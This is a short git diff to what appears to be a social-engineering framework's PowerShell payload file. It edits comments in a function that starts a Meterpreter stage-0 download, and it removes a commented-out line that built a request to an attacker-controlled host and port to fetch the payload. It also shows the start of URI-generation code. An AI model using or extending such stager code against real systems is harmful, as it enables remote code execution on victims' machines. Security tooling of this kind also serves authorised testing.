diff --git a/extensions/social_engineering/powershell/powershell_payload b/extensions/social_engineering/powershell/powershell_payload index 3caa4c19b..04e127ad1 100644 --- a/extensions/social_engineering/powershell/powershell_payload +++ b/extensions/social_engineering/powershell/powershell_payload @@ -404,9 +404,7 @@ function Invoke-ps } } - # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh? - # # $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" - # # Write-Verbose "Requesting meterpreter payload from $Request" + # Meterpreter to initiate stage 0. $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray() $x = "" function sum($v){